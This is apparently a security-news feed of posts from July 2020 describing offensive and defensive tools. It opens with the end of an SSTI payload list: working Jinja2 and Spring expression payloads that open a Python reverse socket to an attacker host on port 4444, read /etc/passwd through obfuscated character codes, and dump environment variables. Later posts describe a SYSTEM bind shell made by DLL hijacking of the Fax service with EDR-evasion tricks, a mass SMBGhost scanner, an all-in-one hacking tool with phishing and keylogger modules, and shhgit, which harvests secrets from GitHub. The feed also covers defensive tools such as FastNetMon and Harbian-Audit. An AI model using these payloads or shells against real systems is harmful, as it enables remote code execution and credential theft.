{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x   ()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).co   ncat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

References :

Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/payloadbox/ssti-payloads.git

Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:payloadbox/ssti-payloads.git


How to Report IP Addresses

July 3, 2020, 2:30 pm
$
0
0
Spam is a common nuisance for users of the Internet. However, it is not just annoying - these messages may cause substantial harm. While businesses use spam as a cheap way of promotion, criminals send it to snatch sensitive data. Fortunately, there is a quick way to counteract the offenders. 
Every source of spam has a unique identifier. An IP address is assigned to any internet-connected device. When it is reported to special watchdog services, senders are blocked automatically. You can learn how to report IP address on https://cleantalk.org/blacklists/report-ip and keep cheeky spammers at bay. 


The Purpose

Companies developing such software compile blacklists of fishy senders. These are crucial for anti-spam defense. Any user can contribute to the fight against spam. With basic details (domain/IP), you can add cyber offenders to the database.  However, this is just one use of the system.
On the other hand, IP reporting services are handy for companies. They can make sure their marketing efforts will not be futile. Emails from blacklisted sources never reach their target audience. Thus, any sender of sizeable volumes should first check if their IP is legit. 
Thirdly, such lists are vital for the advancement of Internet filters. Internet Service Providers (ISPs) never stop improving their barriers and they need to update data. Every complaint added to such blacklist improves the efficiency of cyber protection. The effects are felt across the web.

How Blacklists Work 

All sources of active mailing can be identified by their IP or domain. Mail Abuse Prevention Systems track these identifiers and spot suspicious senders. This is not rocket science.
What happens once you hit the ‘Send’ button for an email? Your IP address is detected by the mail system. Servers of the recipient’s side can now verify you as the sender. To do so, they reach out to blacklists. If the IP/domain was previously reported, the message will either go to the junk or be rejected completely - this depends on the number of complaints. 
Complaints never stop flowing in. For instance, one of the biggest databases now has 4.8+ million IPs, roughly 13+ million emails, and almost 1.5 million sites. But where does the data come from?

Sources of Information 

There are two key sources of blacklisting. These are manual and automatic. On the one hand, users submit complaints. Meanwhile, open relay servers and spamming software are detected by defense systems. Finally, inactive email addresses may function as spam traps. In the first subjective case, common triggers are situations when users:

  • do not remember signing up;
  • cannot find the unsubscribe link;
  • get too many messages, or
  • dislike the content generally.



Using Blacklists to Report and Check

Companies should check their IPs regularly. A blacklisted address sends any message to oblivion, regardless of content. Users, on the other hand, can report annoying spammers. Both procedures are simple: open the blacklist, enter the IP/email address, and hit ‘Search’ to launch the check. Alternatively, select an attack type and hit ‘Send report’.








GoGhost - High Performance, Lightweight, Portable Open Source Tool For Mass SMBGhost Scan

July 4, 2020, 5:30 am
$
0
0

GoGhost is a High Performance, lightweight, portable Open Source tool for mass SMBGhost Scan.

Installation
You can download Windows Binary or Linux Binary. Alternatively, GoGhost uses native Golang libraries so the line above would be fine to compile it:
go build GoGhost.go

Usage Options


GoGhost Scanned 25,000 IP addresses in less than 3 seconds, NMAP took more than 600.


-iL [FILE]
By using the -iL option you're able to specify a list file with CIDRs in file.

-iR [CIDR]
By using the -iR option you're able to specify an IP Range.

False Positive & False Negative
If the Windows is patched with KB4551762, GoGhost will still flag it as vulnerable. If the list of CIDRs in the file is bigger than 500k IP Addresses it may flag some vulnerable as Timeout.

The Results
Timeout => Closed Port
Not Vulnerable => Does not has compression
Vulnerable => LZNT1 compression on SMB.

Disclaimer
This tool was coded to measure the impact of SMBGhost in Latin America and Deepsecurity is not responsible for the use of this tool.


FastNetMon Community - Very Fast DDoS Analyzer With Sflow/Netflow/Mirror Support

July 4, 2020, 3:00 pm
$
0
0

FastNetMon - A high performance DoS/DDoS load analyzer built on top of multiple packet capture engines (NetFlow, IPFIX, sFlow, AF_PACKET, SnabbSwitch, netmap, PF_RING (obsoleted), PCAP).

What do we do?
We detect hosts in the deployed network sending or receiving large volumes of traffic, packets/bytes/flows, per second and perform a configurable action to handle that event. These configurable actions include notifying you, switching off the server, or blackholing the client.
Flow is one or more ICMP, UDP, or TCP packets which can be identified via their unique src IP, dst IP, src port, dst port, and protocol fields.

Integration with flow systems
At a very high level integration with FastNetMon is fairly simple. In both cases the work flow is the same and the main difference being the port numbers provided. The port numbers are configurable.

sFlow
Configure the IP of the server running FastNetMon using port 6343. This port number is configurable.

Netflow
Configure the IP of the server running FastNetMon using port 2055. This port number is configurable.
License: GPLv2
Official mirror at GitLab

Project

Official support groups:

Follow us at social media:

Supported packet capture engines
  • NetFlow v5, v9
  • IPFIX
  • sflow v4, v5
  • PCAP
  • AF_PACKET
  • Netmap
  • SnabbSwitch (experimental)
  • PF_RING / PF_RING ZC (obsoleted, not recommented, please use AF_PACKET instead)
You can check out the comparison table for all available packet capture engines.

Complete integration with the following vendors

Features
  • Complete BGP Flow Spec support, RFC 5575
  • Process and distinguish incoming and/or outgoing traffic
  • Trigger block/notify script if an IP exceeds defined thresholds for packets/bytes/flows per second
  • Thresholds can be configured per-subnet with the hostgroups feature
  • Announce blocked IPs via BGP to routers with ExaBGP
  • GoBGP integration for unicast IPv4 announcements (available in master branch only).
  • Full integration with Graphite and InfluxDB
  • API (available in master branch only)
  • Redis integration
  • MongoDB integration
  • Deep Packet Inspection (DPI) for attack traffic
  • netmap support (open source; wire speed processing; only Intel hardware NICs or any hypervisor VM type)
  • SnabbSwitch support (open source, very flexible, LUA driven, very-very-very fast)
  • Filter NetFlow v5 flows or sFLOW packets with LUA scripts (useful for excluding particular ports)
  • Supports L2TP decapsulation, VLAN untagging and MPLS processing in mirror mode
  • Works on server/soft-router
  • Detects DoS/DDoS in as little as 1-2 seconds
  • Tested up to 10Gbps with 12Mpps on an Intel i7-3820 processor with an Intel 82599 NIC
  • Complete plug-in support
  • Capture attack fingerprints in PCAP format
  • Complete support for most popular attack types

Running Fastnetmon

Supported platforms

Supported architectures
  • x86 64-bit (recommended)
  • x86 32-bit

Hardware requirements
  • At least 1 GB of RAM for compilation purposes

Router integration instructions

Distributions supported

Screenshots
Main program:


Example CPU load on Intel i7-2600 with Intel X540/82599 NIC at 400Kpps load:


Example deployment scheme:


Example of notification email about detected attack:
Author: Pavel Odintsov


HackingTool - ALL IN ONE Hacking Tool For Hackers

July 5, 2020, 5:30 am
$
0
0

This project still in BETA so you may face problems, Please open an issue so i'll fix them..!!

Hackingtool Menu
  • AnonSurf
  • Information Gathering
  • Password Attack
  • Wireless Attack
  • SQL Injection Tools
  • Phishing Attack
  • Web Attack Tool
  • Post exploitation
  • Forensic Tools
  • Payload Creator
  • Router Exploit
  • Wifi Jamming
  • SocialMedia Attack
  • SocialMedia Finder
  • Android Hack
  • Steganography
  • Other Tools
  • Update System

AnonSurf
  • Anonmously Surf
  • Multitor

Information Gathering
  • Nmap
  • Dracnmap
  • Port Scanning
  • Host To IP
  • Xerosploit
  • Advanced XSS Detection Suite
  • ReconSpider

Password Attack
  • Cupp
  • WordlistCreator
  • Goblin WordGenerator
  • Credential reuse attacks

Wireless Attack
  • WiFi-Pumpkin
  • pixiewps
  • Bluetooth Honeypot GUI Framework
  • Fluxion
  • Wifiphisher
  • Wifite
  • EvilTwin

SQL Injection Tools
  • sqlmap tool

Phishing Attack
  • Setoolkit
  • SocialFish
  • Shellphish
  • BlackEye
  • I-See_You(Get Location using phishing attack)
  • SayCheese (Grab target's Webcam Shots)
  • QR Code Jacking

Web Attack
  • SlowLoris
  • Skipfish
  • SubDomain Finder
  • CheckURL
  • Blazy

Post Explotation
  • Vegile - Ghost In The Shell
  • Chrome Keylogger

Forensic Tool
  • Bulk_extractor
  • Disk Clone and ISO Image Aquire
  • AutoSpy

Payload Generator
  • The FatRat*
  • Brutal
  • Stitch
  • MSFvenom Payload Creator
  • Venom Shellcode Generator
  • Spycam

Router Exploitation
  • RouterSploit
  • Fastssh

SocialMedia Attack
  • Instagram Attack
  • Tweeter Attack
  • Facebook Attack
  • Application Checker

SocialMedia Finder
  • Find SocialMedia By Facial Recognation System
  • Find SocialMedia By UserName

Android HAcking
  • Keydroid
  • MySMS
  • Getdroid
  • DroidFiles (Get files from Android Directories)
  • Lockphish (Grab target LOCK PIN)
  • Whatsapp Attack
  • DroidCam (Capture Image)
  • EvilApp (Hijack Session)

Steganography
  • SteganoHide
  • StegnoCracker
  • Whitespace






Installation in Linux :

This Tool Must Run As ROOT !!!
git clone https://github.com/Z4nzu/hackingtool.git

chmod -R 755 hackingtool && cd hackingtool

sudo pip3 install -r requirement.txt

./install.sh

sudo hackingtool
After Following All Steps Just Type In Terminal root@kaliLinux:~hackingtool

Some tool used in hackingtool By below authors :
thelinuxchoice
UndeadSec


Follow on :- GitHubTwitter


Exe_To_Dll - Converts A EXE Into DLL

July 5, 2020, 4:48 pm
$
0
0

Converts an EXE, so that it can be loaded like a DLL.
Supports both 32 and 64 bit DLLs
Inspired by the idea of @guywhataguy. Read more here.

Download:
Fresh builds can be downloaded from the build server (click on the build and choose the "Artifacts" tab)

Clone:
Use recursive clone to get the repo together with all the submodules:
git clone --recursive https://github.com/hasherezade/exe_to_dll.git


Faxhell - A Bind Shell Using The Fax Service And A DLL Hijack

July 6, 2020, 6:00 am
$
0
0


A Proof-of-Concept bind shell using the Fax service and a DLL hijack based on Ualapi.dll.
See our writeup at: https://windows-internals.com/faxing-your-way-to-system/

How to use
  • Build Ualapi.dll and place in c:\windows\system32
  • Start the Fax service, which will load the DLL and call the export UalStart. UalStart will queue a thread pool work item that will open a handle to RpcSs, find a SYSTEM token, and then impersonate it. Afterward, it will create a socket on the local endpoint address, bind it to port 9299, and then asynchronously wait for a connection using a thread pool I/O completion port.
  • Connect to the socket on port 9299 using your favorite client (such nc(at).exe <ip> 9299) and then type let me in and press ENTER. If you're writing custom code, make sure to send the string let me in\n.
  • The I/O completion packet will then wake up the thread pool callback, which will start a Cmd.exe process under the DcomLaunch service with SYSTEM privileges, binding its input and output handles to the newly created socket.
  • Win!

EDR / AV evasion
  • Uses a service that is not commonly known and not monitored or flagged as suspicious by EDR vendors.
  • Uses the Windows thread pool API to do setup, making stacks harder to read, offloading work through multiple threads, and avoiding easy "hints" that something suspicious is happening.
  • The lifetime of the impersonated tokens is very small, and only the worker thread ever runs as SYSTEM, reverting back to NETWORK SERVICE very quickly and after only doing one API call. This helps reduce the chance of getting caught by various scanners.
  • Uses uncommon socket APIs that make the import table less suspicious and avoids EDR detections, IOCTL hooks, and LSPs.
  • Creates the bind shell under the DcomLaunch service (which is already a SYSTEM service) and not under the Fax service, making it look a lot more natural and avoiding a very suspicious-looking process tree.
  • Leverages a Windows bug that makes it look as if our socket belongs to the Fax service, and not to DcomLaunch or Cmd.exe. If we kill the Fax service it looks like socket belongs to System.

Caveats
This isn't meant to be a drop-in, undetectable, malicious, weaponized shell:
  • It is only a bind shell, which most firewalls will prevent. Opening firewall rules, or using a reverse bind shell, or doing communications over a common port such as 80 or 443 would work better.
  • Other services, notably the Spooler, also load Ualapi.dll. While the system behaves fine if the Fax service is "stuck" in the SERVICE_START_PENDING state, this will cause issues in Spoolsv.exe.
  • There's probably bugs/memory leaks in the PoC -- we tried our best to make things production quality, but we did not run things through Application Verifier or asan.


Search

Git All The Payloads! A Collection Of Web Attack Payloads

July 6, 2020, 2:30 pm
$
0
0

Git All the Payloads! A collection of web attack payloads. Pull requests are welcome!

Usage
run ./get.sh to download external payloads and unzip any payload files that are compressed.

Payload Credits

OWASP

Other

ctf
Requests extracted from either packet captures or log files of capture the flag (ctf) events. Mostly raw data so not all requests are actual payloads, however requests should be deduplicated.

Miscellaneous


Airshare - Cross-platform Content Sharing In A Local Network

July 7, 2020, 5:30 am
$
0
0

Airshare is a Python-based CLI tool and module that lets you transfer data between two machines in a local network, P2P, using Multicast-DNS. It also opens an HTTP gateway for other non-CLI external interfaces. It works completely offline! Built with aiohttp and zeroconf. Checkout the demo.

Features
  • Blazing fast content transfer within a local network.
  • Lets you transfer plain text, send from or receive into your clipboard.
  • Supports transfer of multiple files, directories and large files - content is sent chunk by chunk and never read into memory entirely.
  • Lets you send files whose paths have been copied into the clipboard (more details in the docs).
  • Cross-platform, works on Linux, Windows and Mac (CLI and Web Interface), and also supports mobile (Web Interface).
  • Uses Multicast-DNS service registration and discovery - so you can access content with human-readable code words.
  • Can be used as a module in other Python programs.

Important Links
Source Code: https://github.com/KuroLabs/Airshare
Bug Reports: https://github.com/KuroLabs/Airshare/issues
Documentation: https://airshare.rtfd.io
PyPI: https://pypi.org/project/Airshare

Installation

pip
$ pip install Airshare

pipx
$ pipx install Airshare

Homebrew
$ brew install airshare

Example
Send and receive files and directories.
To send using the CLI,
$ airshare noobmaster requirements.txt
To receive using the CLI,
$ airshare noobmaster
or visit http://noobmaster.local:8000 in the browser to download.
You can also import airshare in any Python program. Visit the documentation for detailed usage instructions.

Known Issues
  • Link-local Name Resolution (for the .local addresses) on non-Apple devices requires Avahi (on Linux) or Bonjour (on Windows). Chances are you already have them, but if you don't, do check the web on how to install them.
  • Android browsers do not have inbuilt Multicast-DNS service discovery, and cannot resolve the .local addresses. For this reason, we included QR Code support, for you to visit the URLs easily.
  • Windows users with Python < 3.8, use Ctrl + Break to quit, as Ctrl + C will not work. This is a known issue with asyncio, which has been fixed in Python 3.8. If you do not have a Break key, try using Ctrl + Fn + B, or check the web for other alternatives (depending on your PC).


Scant3R - Web Security Scanner

July 7, 2020, 3:05 pm
$
0
0

ScanT3r - Web Security Scanner

    _____                ___________     
   / ___/_________ _____/_  __/__  /_____
   \__ \/ ___/ __ `/ __ \/ /   /_ </ ___/
  ___/ / /__/ /_/ / / / / /  ___/ / /    
 /____/\___/\__,_/_/ /_/_/  /____/_/

 # Coded By : Khaled Nassar @knassar702
  • Detect This vulnerabilities
    • Remote Code Execution
      • Linux
    • XSS Reflected
    • Template Injection
      • Jinja2
      • ERB
      • Java
      • Twig
      • Freemarker
    • SQl Injection 

ScreenShot:


GIF




OS Support :
  • Linux
  • Android
  • Windows

Install

Linux
  • open your terminal
  • enter this command 
    $ git clone https://github.com/knassar702/scant3r 
    $ cd scant3r 
    $ python3 -m pip install -r requirements.txt

Android
  • Download Termux App
  • open termux app
  • enter this command
 $ pkg install python -y 
 $ pkg install git -y 
 $ git clone https://github.com/knassar702/scant3r
 $ cd scant3r 
 $ python3 -m pip install -r requirements.txt

Windows
  • Download python3 and install it
  • open your cmd
  • enter this command
$ python3 -m pip install -r requirements.txt

Usage :
Options:
  -h, --help          |    Show help message and exit
  --version           |    Show program's version number and exit
  -u URL, --url=URL   |    Target URL (e.g."http://www.target.com/vuln.php?id=1")
  --data=DATA         |    Data string to be sent through POST (e.g. "id=1")
  --list=FILE         |    Get All Urls from List
  --threads           |    Max number of concurrent HTTP(s) requests (default 10)
  --timeout           |    Seconds to wait before timeout connection
  --proxy             |    Start The Connection with http(s) proxy
  --cookies           |    HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
  --encode            |    How Many encode the payload (default 1)
  --allow-redirect    |    Allow the main redirect
  --user-agent        |    add custom user-agent
  --scan-headers      |    Try to injec   t payloads in headers not parameters (user-agent,referrer)
  --skip-headers      |    Skip The Headersscanning processe
  --sleep             |    Sent one request after some Seconds
  --module            |    add custom module (e.g. "google.py")
  --debug             |    Debugging Mood

Example :
  • post method
    $ python3 scant3r -u 'http://localhost/dvwa/vulnerabilities/exec/' --data='ip=localhost&Submit=Submit'
  • add cookies
    $ python3 scant3r -u 'http://localhost/?l=2' --cookies='user=admin&id=1'
  • add timeout
    $ python3 scant3r -u 'http://localhost/?l=13' --timeout=1
  • allow redirects (302,301)
    $ python3 scant3r -u 'http://localhost/?l=13' --allow-redirect
  • sleeping
    $ python3 scant3r -u 'http://localhost/?l=13' --sleep=2
  • debugging mood
    $ python3 scant3r -u 'http://localhost/?l=13' --debug
  • scanning all headers
    $ python3 scant3r -u 'http://localhost/?l=13' --scan-headers
  • skip headers
    $ python3 scant3r -u 'http://localhost/?l=13' --skip-headers
  • add custom user-agent
    $ python3 scant3r -u 'http://localhost/?l=13' --user-agent='CustomUseragent(v2)'
  • add encoding
    $ python3 scant3r -u 'http://localhost/?l=13' --encode=2
  • add proxy
    $ python3 scant3r -u 'http://localhost/?l=13' --proxy='http://localhost:8080'
  • run your own module
    $ python3 scant3r -u 'http://localhost/?l=13' --module=dumper.py
  • add urls list
    $ python3 scant3r --list urls.txt --threads=40


Shhgit - Find GitHub Secrets In Real Time

July 8, 2020, 5:30 am
$
0
0




Shhgit finds secrets and sensitive files across GitHub code and Gists committed in near real time by listening to the GitHub Events API.

NEW: LIVE VERSION. Find GitHub secrets straight from your browser!

Finding secrets in GitHub is nothing new. There are many great tools available to help with this depending on which side of the fence you sit. On the adversarial side, popular tools such as gitrob and truggleHog focus on digging in to commit history to find secret tokens from specific repositories, users or organisations. On the defensive side, GitHub themselves are actively scanning for secrets through their token scanning project. Their objective is to identify secret tokens within committed code in real-time and notify the service provider to action. So in theory if any AWS secret keys are committed to GitHub, Amazon will be notified and automatically revoke them.
I developed shhgit to raise awareness and bring to life the prevalence of this issue. I hope GitHub will do more to prevent bad actors using the treasure trove of information across the platform. I don't know the inner-workings of their token scanning project but delaying the real-time feed API until the pipeline has completed and posing SLAs on the providers seems like a step in the right direction.
With some tweaking of the signatures shhgit would make an awesome addition to your bug bounty toolkit.

Run from Docker
  1. Edit config.yaml and insert your github credentials
  2. $ docker run -v $(pwd)/config.yaml:/config.yaml:ro fnxpt/shhgit


Installation
You can use the precompiled binariesor build from source:
  1. Install Go for your platform.
  2. $ go get github.com/eth0izzle/shhgit will download and build shhgit.
  3. See usage.

Usage
shhgit needs to access the public GitHub API so you will need to obtain and provide an access token. The API has a hard rate limit of 5,000 requests per hour per account, regardless what token is used. The more account-unique tokens you provide, the faster you can process the events. Follow this guide to generate a token; it doesn't require any scopes or permissions. And then place it under github_access_tokens in config.yaml. Note that it is against the GitHub terms to bypass their rate limits. Use multiple tokens at your own risk.
Unlike other tools, you don't need to pass any targets with shhgit. Simply run $ shhgit to start watching GitHub commits and find secrets or sensitive files matching the included 120 signatures.
Alternatively, you can forgo the signatures and use shhgit with a search query, e.g. to find all AWS keys you could use shhgit --search-query AWS_ACCESS_KEY_ID=AKIA

Options
--clone-repository-timeout
        Maximum time it should take to clone a repository in seconds (default 10)
--csv-path
        Specify a path if you want to write found secrets to a CSV. Leave blank to disable
--debug
        Print debugging information
--entropy-threshold
        Finds high entropy strings in files. Higher threshold = more secret secrets, lower threshold = more false positives. Set to 0 to disable entropy checks (default 5.0)
--maximum-file-size
        Maximum file size to process in KB (default 512)
--maximum-repository-size
        Maximum repository size to download and process in KB) (default 5120)
--minimum-stars
        Only clone repositories with this many stars or higher. Set to 0 to ignore star count (default 0)
--path-checks
        Set to false to disable file name/path signature checking, i.e. just match regex patterns (default true)
--process-gists
        Watch and proces   s Gists in real time. Set to false to disable (default true)
--search-query
        Specify a search string to ignore signatures and filter on files containing this string (regex compatible)
--silent
        Suppress all output except for errors
--temp-directory
        Directory to store repositories/matches (default "%temp%\shhgit")
--threads
        Number of concurrent threads to use (default number of logical CPUs)

Config
The config.yaml file has 6 elements. A default is provided.
github_access_tokens: # provide at least one token
  - 'token one'
  - 'token two'
slack_webhook: '' # url to your slack webhook. Found secrets will be sent here
blacklisted_extensions: [] # list of extensions to ignore
blacklisted_paths: [] # list of paths to ignore
blacklisted_entropy_extensions: [] # additional extensions to ignore for entropy checks
signatures: # list of signatures to check
  - part: '' # either filename, extension, path or contents
    match: '' # simple text comparison (if no regex element)
    regex: '' # regex pattern (if no match element)
    name: '' # name of the signature

Signatures
shhgit comes with 120 signatures. You can remove or add more by editing config.yaml.
Chef private key, Potential Linux shadow file, Potential Linux passwd file, Docker configuration file, NPM configuration file, Environment configuration file, Contains a private key, AWS Access Key ID Value, AWS Access Key ID, AWS Account ID, AWS Secret Access Key, AWS Session Token, Artifactory, CodeClimate, Facebook access token, Google (GCM) Service account, Stripe API key, Google OAuth Key, Google Cloud API Key
Google OAuth Access Token, Picatic API key, Square Access Token, Square OAuth Secret, PayPal/Braintree Access Token, Amazon MWS Auth Token, Twilo API Key, MailGun API Key, MailChimp API Key, SSH Password, Outlook team, Sauce Token, Slack Token, Slack Webhook, SonarQube Docs API Key, HockeyApp, Username and password in URI, NuGet API Key, Potential cryptographic private key, Log file, Potential cryptographic key bundle, Potential cryptographic key bundle
Potential cryptographic key bundle, Potential cryptographic key bundle, Pidgin OTR private key, OpenVP   N client configuration file, Azure service configuration schema file, Remote Desktop connection file, Microsoft SQL database file, Microsoft SQL server compact database file, SQLite database file, SQLite3 database file, Microsoft BitLocker recovery key file
Microsoft BitLocker Trusted Platform Module password file, Windows BitLocker full volume encrypted data file, Java keystore file, Password Safe database file, Ruby On Rails secret token configuration file, Carrierwave configuration file, Potential Ruby On Rails database configuration file, OmniAuth configuration file, Django configuration file
1Password password manager database file, Apple Keychain database file, Network traffic capture file, GnuCash database file, Jenkins publish over SSH plugin file, Potential Jenkins credentials file, KDE Wallet Manager database file, Potential MediaWiki configuration file, Tunnelblick VPN configuration file, Sequel Pro MySQL database manager bookmark file, Little Snitch firewall configuration file, Day One journal file, Potential jrnl journal file, Chef Knife configuration file, cPanel backup ProFTPd credentials file
Robomongo MongoDB manager configuration file, FileZilla FTP configuration file, FileZilla FTP recent servers file, Ventrilo server configuration file, Terraform variable config file, Shell configuration file, Shell configuration file, Shell configuration file, Private SSH key, Private SSH key, Private SSH key, Private SSH key, SSH configuration file, Potential cryptographic private key, Shell command history file
MySQL client command history file, PostgreSQL client command history file, PostgreSQL password file, Ruby IRB console history file, Pidgin chat client account configuration file, Hexchat/XChat IRC client server list configuration file, Irssi IRC client configuration file, Recon-ng web reconnaissance framework API key database, DBeaver SQL database manager configuration file, Mutt e-mail client configuration file, S3cmd configuration file, AWS CLI credentials file, SFTP connection configuration file, T command-line Twitter client configuration file, Shell configuration file
Shell profile configuration file, Shell command alias configuration file, PHP configuration file, GNOME Keyring database file, KeePass password manager database file, SQL dump file, Apache htpasswd file, Configuration file for auto-login process, Rubygems credentials file, Tugboat DigitalOcean management tool configuration, DigitalOcean doctl command-line client configuration file, git-credential-store helper credentials file, GitHub Hub command-line client configuration file,    Git configuration file

Contributing
  1. Fork it, baby!
  2. Create your feature branch: git checkout -b my-new-feature
  3. Commit your changes: git commit -am 'Add some feature'
  4. Push to the branch: git push origin my-new-feature
  5. Submit a pull request.

Credits
Some code borrowed from Gitrob by Michael Henriksen.

Disclaimer
I take no responsibility for how you use this tool. Don't be a dick.


Harbian-Audit - Hardened Debian GNU/Linux Distro Auditing

July 8, 2020, 2:30 pm
$
0
0

Hardened Debian GNU/Linux and CentOS 8 distro auditing.
The main test environment is in debian GNU/Linux 9/10 and CentOS 8, and other versions are not fully tested. There are no implementations of desktop and SELinux related items in this release.
The code framework is based on the OVH-debian-cis project, Modified some of the original implementations according to the features of Debian 9/10 and CentOS 8, added and implemented check items for STIG Red_Hat_Enterprise_Linux_7_V2R5STIG Ubuntu V1R2 and cisecurity.org recommendations, and also added and implemented some check items by the HardenedLinux community. The audit and apply functions of the infrastructure are implemented, and the automatic fix function is implemented for the items that can be automatically fixed.

$ sudo bash bin/hardening.sh --audit-all
[...]
hardening                 [INFO] Treating /home/test/harbian-audit/bin/hardening/13.15_check_duplicate_gid.sh
13.15_check_duplicate_gid [INFO] Working on 13.15_check_duplicate_gid
13.15_check_duplicate_gid [INFO] Checking Configuration
13.15_check_duplicate_gid [INFO] Performing audit
13.15_check_duplicate_gid [ OK ] No duplicate GIDs
13.15_check_duplicate_gid [ OK ] Check Passed

[...]
################### SUMMARY ###################
      Total Available Checks : 278
         Total Runned Checks : 278
         Total Passed Checks : [ 239/278 ]
         Total Failed Checks : [  39/278 ]
   Enabled Checks Percentage : 100.00 %
       Conformity Percentage : 85.97 %

Quickstart
$ git clone https://github.com/hardenedlinux/harbian-audit.git && cd harbian-audit
$ sudo cp etc/default.cfg /etc/default/cis-hardening
$ sudo sed -i "s#CIS_ROOT_DIR=.*#CIS_ROOT_DIR='$(pwd)'#" /etc/default/cis-hardening
$ sudo bin/hardening.sh --init
$ sudo bin/hardening.sh --audit-all
hardening                 [INFO] Treating /home/test/harbian-audit/bin/hardening/1.1_install_updates.sh
1.1_install_updates       [INFO] Working on 1.1_install_updates
1.1_install_updates       [INFO] Checking Configuration
1.1_install_updates       [INFO] Performing audit
1.1_install_updates       [INFO] Checking if apt needs an update
1.1_install_updates       [INFO] Fetching upgrades ...
1.1_install_updates       [ OK ] No upgrades available
1.1_install_updates       [ OK ] Check Passed
[...]
################### SUMMARY ###################
      Total Available Checks : 278
         Total Runned Checks : 278
            Total Passed Checks : [ 239/278 ]
         Total Failed Checks : [  39/278 ]
   Enabled Checks Percentage : 100.00 %
       Conformity Percentage : 85.97 %
$ sudo bin/hardening.sh --set-hardening-level 5
$ sudo bin/hardening.sh --apply 
hardening                 [INFO] Treating /home/test/harbian-audit/bin/hardening/1.1_install_updates.sh
1.1_install_updates       [INFO] Working on 1.1_install_updates
1.1_install_updates       [INFO] Checking Configuration
1.1_install_updates       [INFO] Performing audit
1.1_install_updates       [INFO] Checking if apt needs an update
1.1_install_updates       [INFO] Fetching upgrades ...
1.1_install_updates       [ OK ] No upgrades available
1.1_install_updates       [INFO] Applying Hardening
1.1_install_updates       [ OK ] No Upgrades to apply
1.1_install_updates       [ OK ] Check Passed
[...]

Usage

Pre-Install
If use Network install from a minimal CD to installed Debian GNU/Linux, need install packages before use the hardening tool.
sudo apt-get install -y bc net-tools pciutils network-manager
Redhat/CentOS need install packages before use the hardening tool:
sudo yum install -y bc net-tools pciutils NetworkManager epel-release

Pre-Set
You must set a password for all users before hardening. Otherwise, you will not be able to log in after the hardening is completed. Example(OS user: root and test):
$ sudo -s 
# passwd 
# passwd test

Configuration
Hardening scripts are in bin/hardening. Each script has a corresponding configuration file in etc/conf.d/[script_name].cfg.
Each hardening script can be individually enabled from its configuration file. For example, this is the default configuration file for disable_system_accounts:
# Configuration for script of same name
status=disabled
# Put here your exceptions concerning admin accounts shells separated by spaces
EXCEPTIONS=""
status parameter may take 3 values:
  • disabled (do nothing): The script will not run.
  • audit (RO): The script will check if any change should be applied.
  • enabled (RW): The script will check if any change should be done and automatically apply what it can.
You can also set the configuration item to enable by modifying the level, following command:
  1. Generate etc/conf.d/[script_name].cfg by audit-all when first use
# bash bin/hardening.sh --audit-all
  1. Enable [script_name].cfg by set-hardening-level Use the command to set the hardening level to make the corresponding level audit entry take effect.
# bash bin/hardening.sh --set-hardening-level <level>
Global configuration is in etc/hardening.cfg. This file controls the log level as well as the backup directory. Whenever a script is instructed to edit a file, it will create a timestamped backup in this directory.

Run aka "Harden your distro (After the hardened, you must perform the "After remediation" section)
To run the checks and apply the fixes, run bin/hardening.sh.
This command has 2 main operation modes:
  • --audit: Audit your system with all enabled and audit mode scripts
  • --apply: Audit your system with all enabled and audit mode scripts and apply changes for enabled scripts
Additionally, --audit-all can be used to force running all auditing scripts, including disabled ones. this will not change the system.
--audit-all-enable-passed can be used as a quick way to kickstart your configuration. It will run all scripts in audit mode. If a script passes, it will automatically be enabled for future runs. Do NOT use this option if you have already started to customize your configuration.
Use the command to harden your OS:
# bash bin/hardening.sh --apply

After remediation (Very important)
When exec --apply and set-hardening-level are set to 5 (the highest level), you need to do the following:
  1. When applying 9.5(Restrict Access to the su Command), you must use the root account to log in to the OS because ordinary users cannot perform subsequent operations. If you can only use ssh for remote login, you must use the su command when the normal user logs in. Then do the following:
# sed -i '/^[^#].*pam_wheel.so.*/s/^/# &/' /etc/pam.d/su
Temporarily comment out the line containing pam_wheel.so. After you have finished using the su command, please uncomment the line.
  1. When applying 7.4.4_hosts_deny.sh, the OS cannot be connected through the ssh service, so you need to set allow access host list on /etc/hosts.allow, example:
# echo "ALL: 192.168.1. 192.168.5." >> /etc/hosts.allow
This example only allows 192.168.1.[1-255] 192.168.5.[1-255] to access this system. Need to be configured according to your situation.
  1. Set capabilities for usual user, example(user name is test):
# sed -i "/^root/a\test    ALL=(ALL:ALL) ALL" /etc/sudoers
  1. Set basic firewall rules Set the corresponding firewall rules according to the applications used. HardenedLinux community for Debian GNU/Linux basic firewall rules:

Iptabels format rules:
etc.iptables.rules.v4.sh to do the following:
$ INTERFACENAME="your network interfacename(Example eth0)"
$ sudo bash docs/configurations/etc.iptables.rules.v4.sh $INTERFACENAME
$ sudo -s
# iptables-save > /etc/iptables/rules.v4 
# ip6tables-save > /etc/iptables/rules.v6

nft format rules:
nftables.conf to do the following(your network interfacename(Example eth0)):
